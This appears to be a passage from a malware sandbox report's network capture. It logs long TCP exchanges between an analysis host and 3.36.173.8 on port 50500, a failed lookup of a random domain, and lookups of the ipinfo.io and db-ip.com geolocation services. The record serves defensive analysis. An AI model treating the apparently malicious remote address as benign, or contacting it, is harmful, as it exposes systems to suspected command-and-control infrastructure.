Jun 28, 2024 19:53:53.090322018 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090332031 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.090358019 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090424061 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.090424061 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.090823889 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090878010 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090893030 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.090914011 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090948105 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.090965033 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.091516972 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.091572046 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.091581106 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.091645002 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.091680050 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.091697931 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.091715097 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.091780901 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.092466116 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.092552900 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.092586994 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.092606068 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.092621088 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.092662096 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.092669964 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.093272924 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.093327045 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.093327999 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.141738892 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.298012018 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298104048 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298156977 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298209906 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298243046 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298279047 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298294067 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.298294067 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.298326969 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298365116 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.298366070 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.298433065 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.299678087 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299711943 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299762011 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299770117 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.299797058 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299830914 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299850941 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.299864054 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299899101 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299918890 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.299932003 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299967051 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.299983025 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.300000906 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300038099 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300056934 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.300091028 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300124884 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300147057 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.300163984 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300198078 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300216913 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.300231934 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300266027 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300287962 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.300301075 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.300355911 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.300981045 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.301034927 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.301136971 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.301141977 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.301203012 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.301237106 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.301256895 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.301274061 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.301326036 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506057024 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506110907 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506165981 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506200075 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506233931 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506285906 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506320953 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506354094 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506390095 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506396055 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506397009 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506397009 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506397009 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506428003 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506503105 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506560087 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506616116 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506649017 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506669998 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506701946 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506736040 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506756067 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506769896 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506803989 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506818056 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.506843090 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.506891966 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.507292986 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507349014 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507383108 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507402897 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.507493019 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507539988 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.507541895 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507674932 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507723093 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.507729053 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507781029 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507817030 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507833958 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.507850885 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507901907 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.507903099 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507940054 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507975101 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.507988930 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.508008957 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508044958 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508059978 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.508577108 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508630037 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.508632898 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508702040 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508738995 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508761883 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.508790016 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508825064 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508846045 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.508858919 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508893967 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508914948 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.508928061 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508965015 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.508984089 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.509470940 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.509527922 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.509537935 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.509597063 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.509630919 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.509654045 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.509665012 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.509725094 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.596832037 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.596868038 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.596904039 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.596916914 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.596959114 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597011089 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597044945 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597055912 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.597079039 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597094059 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.597115040 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597148895 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597151041 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.597182989 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597218990 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597222090 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.597253084 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597289085 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.597296000 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.641453028 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.714755058 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.714884043 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.714936972 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.714991093 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715039968 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715050936 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715050936 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715075016 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715125084 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715131044 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715166092 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715202093 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715221882 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715234995 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715287924 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715289116 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715321064 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715357065 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715377092 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715389013 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715440035 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715441942 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715478897 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715512991 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715529919 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715548992 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715584040 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715605974 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715619087 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715653896 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715673923 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715688944 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715724945 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715751886 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715760946 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715796947 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715815067 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715831995 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715883970 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715887070 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715919971 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715955019 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.715974092 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.715989113 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716023922 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716046095 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716058969 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716094017 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716116905 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716131926 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716166019 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716185093 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716650009 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716684103 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716707945 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716720104 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716773987 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716773987 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716808081 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716842890 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716861963 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716881037 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716934919 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.716937065 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.716986895 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717022896 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717045069 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717056990 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717092037 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717112064 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717128992 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717164040 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717180967 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717217922 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717252970 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717274904 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717287064 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717339039 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717341900 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717374086 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717408895 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717434883 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717443943 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717499018 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717499971 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717533112 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717567921 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717586994 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717600107 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717634916 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717653990 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717669964 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717705011 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717730045 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.717741013 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717777014 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.717797041 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718070030 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718102932 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718128920 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718162060 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718194962 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718218088 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718246937 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718281984 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718302965 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718317032 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718350887 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718374014 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718404055 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718439102 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718461037 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718472004 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718507051 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718523979 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.718542099 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718578100 CEST	50500	55333	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.718596935 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.766577005 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.830223083 CEST	55336	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:53.835139036 CEST	50500	55336	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:53.835223913 CEST	55336	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:54.610471964 CEST	50500	55336	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:54.614372015 CEST	55336	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:54.619309902 CEST	50500	55336	3.36.173.8	192.168.2.4
Jun 28, 2024 19:53:56.954036951 CEST	55333	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:57.641661882 CEST	55336	50500	192.168.2.4	3.36.173.8
Jun 28, 2024 19:53:57.646667004 CEST	50500	55336	3.36.173.8	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 28, 2024 19:51:07.261804104 CEST	62442	53	192.168.2.4	1.1.1.1
Jun 28, 2024 19:51:07.274544954 CEST	53	62442	1.1.1.1	192.168.2.4
Jun 28, 2024 19:51:24.140993118 CEST	53	51212	1.1.1.1	192.168.2.4
Jun 28, 2024 19:53:16.085928917 CEST	65183	53	192.168.2.4	1.1.1.1
Jun 28, 2024 19:53:16.094358921 CEST	53	65183	1.1.1.1	192.168.2.4
Jun 28, 2024 19:53:16.970001936 CEST	59372	53	192.168.2.4	1.1.1.1
Jun 28, 2024 19:53:16.977765083 CEST	53	59372	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 28, 2024 19:51:07.261804104 CEST	192.168.2.4	1.1.1.1	0x16be	Standard query (0)	CcUPthUoPgCKIth.CcUPthUoPgCKIth	A (IP address)	IN (0x0001)	false
Jun 28, 2024 19:53:16.085928917 CEST	192.168.2.4	1.1.1.1	0x3d0e	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Jun 28, 2024 19:53:16.970001936 CEST	192.168.2.4	1.1.1.1	0x9c78	Standard query (0)	db-ip.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 28, 2024 19:51:07.274544954 CEST	1.1.1.1	192.168.2.4	0x16be	Name error (3)	CcUPthUoPgCKIth.CcUPthUoPgCKIth	none	none	A (IP address)	IN (0x0001)	false
Jun 28, 2024 19:53:16.094358921 CEST	1.1.1.1	192.168.2.4	0x3d0e	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
Jun 28, 2024 19:53:16.977765083 CEST	1.1.1.1	192.168.2.4	0x9c78	No error (0)	db-ip.com		172.67.75.166	A (IP address)	IN (0x0001)	false
Jun 28, 2024 19:53:16.977765083 CEST	1.1.1.1	192.168.2.4	0x9c78	No error (0)	db-ip.com		104.26.4.15	A (IP address)	IN (0x0001)	false
Jun 28, 2024 19:53:16.977765083 CEST	1.1.1.1	192.168.2.4	0x9c78	No error (0)	db-ip.com		104.26.5.15	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

https:

db-ip.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.4	49731	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
